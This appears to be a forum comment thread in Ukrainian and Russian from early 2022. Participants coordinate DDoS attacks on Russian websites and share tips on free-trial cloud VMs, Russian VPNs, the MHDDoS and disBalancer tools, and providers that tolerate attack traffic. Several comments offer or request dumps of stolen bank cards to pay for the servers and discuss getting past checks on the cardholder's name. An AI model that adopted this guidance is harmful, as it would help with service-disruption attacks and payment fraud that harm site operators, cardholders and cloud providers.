ці сайти пробують задудость все без розбора, наприклад yandex.ru ....
і дудосять навіть те до чого у них немає дуступу (бан по айпі)
Спробуйте краще — павутина.укр (в строку браузера)

У меня сложилось такое же впечатление. Бандера пытается бить по «площядям»- чем больше, тем лучше

Не пускает встроенный защитник хрома. Че делать?!:)

открывать с впн? >> думаю да.

Друзья, открывать обязательно с VPN! Иначе ip закидывается в бан-лист и толку от вкладок. Я использую браузер опера, там есть встроенный VPN.

Вот ещё 1 Free VPN my.clearvpn.com/...​o/redeem?code=SAVEUKRAINE

ребята, а для тех кто в тупой, можно ли создать имидж ВМ для гугл клауд с готовым софтом для работы над аналогичным проектом?

Багато російських сайтів закрилися від світу — тому треба впн на росію налаштовувати чи російський проксі мати, щоб успішно ддосити (локально).

Ігор, підкажіть можна на ВМ якось впн або проксі додати. З опцій «Region» навряд чи можна буде Росію вибрати...

t.me/disbalancer_group
Офіційний телеграм канал disBalancer, там є посилання до їх комьюніті чату.
Там хлопці пропонують багато впнів із рос локацією, думаю так відповісти буде краще всього

Как проходят оплаты, они же работают по юр лицу в Украине?

база с картами есть , могу кинуть ссылку

просить Cardholder Name якого немає в базі

Є новий злив карт, давайте тг закину

просить Cardholder Name якого немає в базі

Ще є актуальний дамп? @oleksiiB1 якщо можете скиньте

У кого-то сохранился дамп карт Сбера, который недавно выкладывали в инет?
Если сейчас их можно будет заюзать, пусть кацапы за ддос платят.

А як ви збираєтесь їх використовувати, там ж більшість сайтів мають яку-небудь стіну проти кардерів? Якщо є інструкція як це робити, то напишіть сюди @void_none в телеграм

Уже выше писали, что не выйдет — нужны фамилия и имя хозяина карты, а в дампах их нет

Добрий вечір, я юзаю софт MHDdos (github.com/MHProDev/MHDDoS) на тачці з 1гб, 2цпу, (gcp- e2 micro). З нього зміг вижати 1000 потоків (конекшинів) відкритих. Тут не тестили, скільки вижимає тредів на дізбалансері? якщо є питання, або ви можете порекомендувати прояснити деякі тонкощі ддосу плз поділіться інфою. Мій тг: @antl_31

Софт подобається тим, що його можна запустити і забути, він сам буде вибирати цілі. Дуже зручно для тих, кто не дуже розбирається у скриптах та їх запусках, або для тих кто не може оновлювати цілі власноруч.
По перфу в мене було 1000 реквестів за декілька секунд, також 2vcpu!

в мене саме конекшини були, а реквестів не було, напевно працює як SYN flood. Тому не знаю що обирати.

Приветствую. А можно какую-то инструкцию плз со скринами для ажура/диджитал ошун, пофиг кого. с созданием виртуалуки я разберусь, а вот с консолью и установкой — проблемы. Не понимаю :) Пользователь мак. Спасибо!

це інструкція як орендувати тачку, налаштувати ддос telegra.ph/...​dopomogoyu-serverіv-02-26

Ігор, підкажіть, а чим норм спосіб через docker + vpn бомбардувати?

з локального пк? Ні Це не добре, бо ви навантажуєте українську мережу

а якщо знаходишься в західному регіоні прям біля кородону? тут мережа наче не така навантажена

ні навантажена, укр телеком на західному регіоні вже зменшив швидкість із-за цих дудосів. найкращій із варіантів, що тут є це запускати процеси на віддалених машинах із rus vpn

Краще ніж нічого!
Впн потрібен для того, щоб нас не відсікли по принципу «Кто з україни»

Спробува не вийшло Приват Карточку не приймає (

Точно приймає, може відключені інтернет операції.
Дуже рекомендую використовувати для усіх тріалок інтернет-карту(У приваті модна зробити у пару кліків), на якій лежить 50 грн

всьо нормально з приватовськими картками. використав віртуальну валютну для розрахунків в інтернет. можливо в тебе заблоковані розрахунки в інеті для карти

Сервисом не запрещены кибер атаки?

Не жарт. Этот способ хорош для любой машины в облаке, вот только не забанит ли провайдер целый аккаунт? От них будет большой исходящий трафик. Может кто знает провайдера, который в текущее время закрывает глаза на это?

дякую, але в мене дізбалансер на ажурі видає помилки:
[3/1/2022 7:22:16 PM]:Starting client. Registering machine to the network
[3/1/2022 7:22:37 PM]:Cannot register client. Server respond: Unable to connect to the remote server
[3/1/2022 7:22:37 PM]:Started heartbeat process.
[3/1/2022 7:22:58 PM]:Error occured while Heartbeat ping was sent. Error: Unable to connect to the remote server
[3/1/2022 7:23:19 PM]:Cannot register client. Server respond: Unable to connect to the remote server
[3/1/2022 7:23:40 PM]:Error occured while Heartbeat ping was sent. Error: Unable to connect to the remote server
[3/1/2022 7:24:06 PM]:Error occured while Heartbeat ping was sent. Error: Unable to connect to the remote server
[3/1/2022 7:24:32 PM]:Error occured while Heartbeat ping was sent. Error: Unable to connect to the remote server
[3/1/2022 7:24:58 PM]:Error occured while Heartbeat ping was sent. Error: Unable to connect to the remote server
[3/1/2022 7:25:24 PM]:Error occured while Heartbeat ping was sent. Error: Unable to connect to the remote server
[3/1/2022 7:25:29 PM]:Starting client. Registering machine to the network
[3/1/2022 7:25:50 PM]:Error occured while Heartbeat ping was sent. Error: Unable to connect to the remote server
[3/1/2022 7:25:50 PM]:Stopped all tasks. Disconnected from sync-server.
[3/1/2022 7:26:11 PM]:Cannot register client. Server respond: Unable to connect to the remote server

Що робити?

Доки писав статтю — Хлопці вирішили почати оновлювати backend сервер, сподіваюся скоро дороблять.
Поки що вони оновлюють — можна взяти інший бомбер, та запустити його.
github.com/topics/ddos

Дякую, поки запустив цей https://stop-russian-desinformation.near.page/

troywell в хромі на віртуалці працює

дякую, корисна стаття 🇺🇦

oracle could дает хорошие машинки, можно 1 мощную или 4 слабеньких поднять и бомбить во все направления

Это если выцепить свободное место на нодах именно под машинку на ядрах Ampere. Чаще всего ресурсов нет, но есть способ как автоматически чекать раз в минуту доступность места в локации и заказать сразу как только появятся ресурсы. archive.ph/OjSqw

А чи є можливість встановити на машині VPN тільки на вихід?

Можна, але для віртуалку ажур дасть нову айпі адресу, що ще не була засвічена у впн.
Айпі адреси впнів можна залишити не забаненними для тих, хто використовує атаки із власних пк

ну тут більше питання в тому що багато ресурсів вже блокують зовнішні пакети, але все ще доступні зсередини, то маючи там впн з російською адресою можна було б атакувати ефективніше

А можна зробити інструкцію для чайника? Якщо не важко. Є багато друзів не з айті, які хочуть допомогти у цьому.

Ця такою і задумана, там останній крок -просто скачати і запустити ехе файл disbalancer

Я розумію, але те що для нас просто, для інших людей може бути важко. Треба до останнього кроку з картинкою та посиланням, де скачати та де тицьнути. І дякую за цю роботу! Слава Україні!

для простих людей — скачати оперу, запустити режим інкогніто з впн, відкрити playforukraine.live з великих плюсів це те що там прикольна гра. Сам залипаю коли приходжу глянути чи все працює :)

обовязково в інкогніто чи можна в звичайній вкладці?

Отлично. Спасибо. Доберусь до нормального интернета и займусь

Те саме з GCP, але дають більше — $300. Сьогодні пробував

Заполняем поля с кредиткой.

На цьому кроці можна ввести картку окупанта?

там вроде не должно быть 3D secure, можно попробовать

Геніально, там можна і найпотужнішу віртуалку брати, нехай платять

просить Cardholder Name якого немає в базі

Q Dmytro Lypovetskiy: Тут iнфа, що епам залочив ноутбуки тим, кто робив ддос атаки. Хтось може це пiдтвердити?
A: я з епама. г—дони еще те. блокают скачування будьякого впн. мабуть ддос через докер чи другими способами теж блокают. але акції їх просіли — зашибісь... хай йдуть туди куди і русский корабль

А цей спосіб якраз виключає необхідність використовувати компанійська техніку, також плюс

Ігор, підкажіть, а чим норм спосіб через docker + vpn бомбардувати?

Ну так логично что залочили, нельзя такое делать в таком формате, нужны другие варианты.

Підписатись на коментарі